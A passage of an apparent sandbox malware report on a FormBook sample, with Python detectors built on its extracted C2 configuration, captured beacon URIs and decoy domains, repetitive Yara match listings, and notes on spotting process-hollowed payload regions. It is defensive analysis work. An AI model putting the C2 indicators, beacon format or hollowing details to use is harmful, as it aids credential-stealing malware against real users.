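# FormBook configuration as extracted in the report (decoy list shortened to four of the 64).
CONFIG = json.loads("""{"C2 list": ["www.worklifefirewalls.com/m9y5/"],
  "decoy": ["cryptocurrenciesmarketcaps.com", "qzbozhijy.com", "lume24.com", "legaslktiy3.xyz"]}""")

# Constructed request records modelled on the report's captured beacons, plus a benign control
# and a hypothetical beacon to the configured C2 host itself.
REQUESTS = [
    {"host": "www.qzbozhijy.com",
     "uri": "/m9y5/?GDHDO=orMzR/RfXnMhfSAyBjBjnR1lGR+TvkHzuwdFBkAhJBLh1eKTDfMMMN4zoKLE4Jh6elIQ&2d0tk4=7nxxAXLHM4",
     "headers": {"Host": "www.qzbozhijy.com", "Connection": "close"}},
    {"host": "www.cryptocurrenciesmarketcaps.com",
     "uri": "/m9y5/?GDHDO=nj3oxEIT1zdIdiXK9EykkBiMkkzJg0Of7VGGA4YdAoGVUT4DfIqyC+XPG7GpV3gppNhE&2d0tk4=7nxxAXLHM4",
     "headers": {"Host": "www.cryptocurrenciesmarketcaps.com", "Connection": "close"}},
    {"host": "www.example.com", "uri": "/index.html",
     "headers": {"Host": "www.example.com", "User-Agent": "Mozilla/5.0", "Connection": "keep-alive"}},
    {"host": "www.worklifefirewalls.com", "uri": "/m9y5/?GDHDO=" + "A" * 64 + "&2d0tk4=7nxxAXLHM4",
     "headers": {"Host": "www.worklifefirewalls.com", "Connection": "close"}},
]

# Two query parameters, the first carrying a long base64-like blob: the shape seen in this sample.
BEACON_QUERY = re.compile(r"^[A-Za-z0-9]+=[A-Za-z0-9+/=]{40,}&[A-Za-z0-9]+=[A-Za-z0-9]+$")


def strip_www(host: str) -> str:
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def indicators(config: dict) -> dict:
    """Split the extracted config into matchable pieces: C2 hosts, C2 URI paths, decoy hosts."""
    c2_hosts, c2_paths = set(), set()
    for entry in config["C2 list"]:
        parts = urlsplit("http://" + entry)        # entries are host/path without a scheme
        c2_hosts.add(strip_www(parts.hostname))
        c2_paths.add(parts.path)
    return {"c2_hosts": c2_hosts, "c2_paths": c2_paths,
            "decoys": {strip_www(d) for d in config["decoy"]}}


def classify(req: dict, ind: dict) -> list:
    """Return the list of indicator names a request matches (empty for a clean request)."""
    reasons = []
    host = strip_www(req["headers"].get("Host", req["host"]))
    parts = urlsplit(req["uri"])
    if host in ind["c2_hosts"]:
        reasons.append("c2_host")
    if host in ind["decoys"]:
        reasons.append("decoy_host")
    if parts.path in ind["c2_paths"]:
        reasons.append("c2_path")
    if BEACON_QUERY.match(parts.query):
        reasons.append("beacon_query_shape")
    if "User-Agent" not in req["headers"]:
        reasons.append("no_user_agent")
    return reasons


def verdict(reasons: list) -> str:
    """Path or host from the config is conclusive; a decoy host alone is a weak signal."""
    if "c2_path" in reasons or "c2_host" in reasons:
        return "c2"
    if len(reasons) >= 2:
        return "suspicious"
    return "benign"


if __name__ == "__main__":
    ind = indicators(CONFIG)
    for req in REQUESTS:
        reasons = classify(req, ind)
        print(req["host"], verdict(reasons), reasons)
```

Decoy domains are real third-party sites, so a hit on `decoy_host` by itself is only context; the rule that survives the decoy rotation is the `/m9y5/` path combined with the request shape, which is why `verdict()` treats `c2_path` as conclusive.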

          E-Banking Fraud

Source: Yara match | File sources: the same 9 unpacked PE files (type: UNPACKEDPE) and 11 memory dumps (type: MEMORY) listed under AV Detection

          System Summary

Source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
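The dump names in the Yara match list above encode where each matched region lived, which is what decides which dump to pull first when carving the unpacked Formbook payload. The Python below is added here as an example; it is not part of the Joe Sandbox report or of any Joe Sandbox tooling. The field layout it decodes is inferred from the values on this page and is an assumption: the first field matches the process index used in the `13_2_` code-function prefixes, the fifth field holds a Win32 PAGE_* protection value and the seventh a Win32 MEM_* region type. The remaining fields are left undecoded.

```python
"""Decoder for Joe Sandbox memory-dump names as they appear in the Yara match
list, e.g.
0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp

Field layout (inferred from the values on this page; an assumption, not a
documented format):
  1 process index (hex)    0xD -> 13, the "13_2_" prefix of cmd.exe's code functions
  2 dump phase (hex)       2 -> the "_2_" half of that prefix
  3 dump sequence number
  4 region base address (hex)
  5 page protection        Win32 PAGE_* value
  6 allocation flags       not decoded here
  7 region type            Win32 MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE
  8 module index           not decoded here
"""
from dataclasses import dataclass
import re

# Win32 page protection constants (winnt.h)
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Win32 memory region types (winnt.h)
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<alloc>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<modidx>[0-9A-Fa-f]{8})\.sdmp$"
)

# Dump names copied from the Yara match list on this page
SAMPLE_DUMPS = [
    "0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp",
    "00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp",
    "00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp",
    "00000001.00000000.430396179.000000000119E000.00000002.00000001.01000000.00000004.sdmp",
]


@dataclass(frozen=True)
class MemoryDump:
    process: int
    phase: int
    seq: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self):
        # Mask off PAGE_GUARD / PAGE_NOCACHE modifier bits before the lookup
        return PAGE_PROTECTION.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self):
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    @property
    def code_function_prefix(self):
        # Matches the "13_2_" style prefix of the report's "Code function:" lines
        return f"{self.process}_{self.phase}_"

    def is_writable_executable(self):
        return (self.protect & 0xFF) in (0x40, 0x80)


def parse_dump_name(name):
    m = _DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return MemoryDump(process=int(m["proc"], 16), phase=int(m["phase"], 16),
                      seq=int(m["seq"]), base=int(m["base"], 16),
                      protect=int(m["prot"], 16), mem_type=int(m["mtype"], 16))


def payload_candidates(names):
    """Writable+executable regions that are not backed by an image on disk
    (private or mapped): where a hollowed-in or unpacked payload lands.
    Sorted by process index, then base address."""
    dumps = [parse_dump_name(n) for n in names]
    picked = [d for d in dumps if d.is_writable_executable() and d.mem_type != 0x1000000]
    return sorted(picked, key=lambda d: (d.process, d.base))


if __name__ == "__main__":
    for d in payload_candidates(SAMPLE_DUMPS):
        print(f"{d.code_function_prefix:<6} base=0x{d.base:08X} {d.protect_name} {d.type_name}")
```

Run on the names from this page, the filter keeps the 0x400000 region of process 2 (the second fdvucso.exe), which is PAGE_EXECUTE_READWRITE and MEM_PRIVATE rather than MEM_IMAGE; that is what an image base looks like after process hollowing has unmapped the original module and written a new one in. The PAGE_READWRITE heap region at 0x580000 and the read-only .rdata of the on-disk image are dropped, even though the Yara rules also fired on them.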
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Code function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_01191890
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_0119A184
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_0119C3BD
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_0119B3F1
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_01199C12
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_01197E88
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_011996A0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041E819
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_00401030
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041E0B6
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_00402D89
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_00409E5B
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041DE2C
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041E79E
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0119A184
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_01191890
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0119C3BD
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0119B3F1
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_01199C12
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_01197E88
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_011996A0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E528EC
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D9B090
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E520A8
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB20A0
